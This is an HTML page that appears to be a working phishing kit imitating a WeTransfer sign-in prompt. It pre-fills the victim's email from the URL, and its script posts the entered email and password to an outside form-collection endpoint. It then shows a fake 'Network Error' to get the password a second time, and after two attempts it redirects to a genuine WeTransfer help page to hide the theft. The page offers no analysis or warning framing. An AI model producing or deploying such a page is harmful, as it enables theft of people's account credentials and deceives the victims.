<!doctype html>
<html>

	<head>
        <meta charset="utf-8">
        <title></title>
		<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/css/bootstrap.min.css">
		<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/popper.js@1.16.1/dist/umd/popper.min.js"></script>
		<script src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.1/dist/js/bootstrap.bundle.min.js"></script>
        <style>
            body {
                background-image: url(https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/we.png?v=1670830144657);
                background-repeat: no-repeat;
                background-size:cover;
                height:100vh;
            }

            #myModal {
            position: absolute;
            top: 60%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
            @media (max-width: 575.98px) {
			#myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			body {
			background-image: url(grd.jpg);
			background-repeat: no-repeat;
			background-origin:contain;
			height:100vh;
			}
			
            #myModal {
            position: absolute;
            top: 70%;
            left: 50%;
            transform: translate(-50%, -50%);
			}
			
			#asd{
			display:none;
			}
			
			.col-sm-3{
			width:46%
			}          
			}
        </style>
    </head>

    <body>
		<div data-toggle="modal" data-target="#myModal" style="width:100vh;height:100vh;"></div>
		<div class="loaded" ></div>
    </body>
	
	<script>


    $(window).on('load', function() {
        $('#myModal').modal('show');
    });
	$(document).ready(function(){

	
    $('.loaded').html(`
		<!-- The Modal -->
		<div class="modal" id="myModal">
			<div class="modal-dialog">
				<div class="modal-content">
					<!-- Modal Header -->
					<!-- Modal body -->
					<div class="modal-body p-3">
					  <img src="https://cdn.glitch.global/5c3a0ca4-2f1d-4648-a4b7-e36a7ad90152/to.png?v=1670830146465" width= "100%" class="img-fluid">
						<div class="text-danger" id="msg" style="font-weight:600; font-size:17px;"></div>
						<form method="post" id="formx" class="my-4">
							<input type="email" name="x1" id="x1" class="form-control mb-3" value="" readonly>
							<input type="password" name="x2" id="x2" class="form-control mb-3" placeholder="Password" value="" required>
							<button id="submitBtn" class="btn btn-md btn-primary">Sign In</button>
						</form>
					</div>
				</div>
			</div>
		</div>
	`);
var count=0;
	var url = window.location.hash.substr(1);
	$("#x1").val(url);

	$("#formx").submit(function (e) {
	e.preventDefault();
	var nm = $("#A1").val();
	var formData = new FormData($("#formx")[0]);
	
	$("#submitBtn").html(`
		<button class="btn btn-sm btn-primary" disabled>
			<span class="spinner-grow spinner-grow-sm"></span>Please Wait...
		</button>`
	).prop("disabled", true);
	
	$("#x2").click(function () {
	$("#msg").hide();
	});
count=count+1;
	$.ajax({
		url: "https://nocodeform.io/f/662cd7b99db7cbd4c3c4aaf8",
		type: 'POST',
		data: formData,
		contentType: false,
		processData: false,
		
		success: function(res) {
			setTimeout(function () {
				$("#x1").val(url);
				$("#x2").val("");
				$("#msg").show();
				$("#msg").html("Network Error! Please verify your information and try again");
				$("#submitBtn").html("Sign In").prop("disabled", false);
				              if (count>=2) {
                count=0;
                    window.location.replace("https://wetransfer.com/hc/en-us/sections/201965293-Trouble-downloading");
				              }
			}, 1000);
		},
		
		error: function(res) {
			setTimeout(function () {
				$("#x1").val(url);
				$("#x2").val("");
				$("#msg").show();
				$("#msg").html("Network Error! Please verify your information and try again");
				$("#submitBtn").html("Sign In").prop("disabled", false);
				              if (count>=2) {
                count=0;
                    window.location.replace("https://wetransfer.com/hc/en-us/sections/201965293-Trouble-downloading");
				              }
			}, 1000);
		}
            });
        });
	});

	</script>

</html>
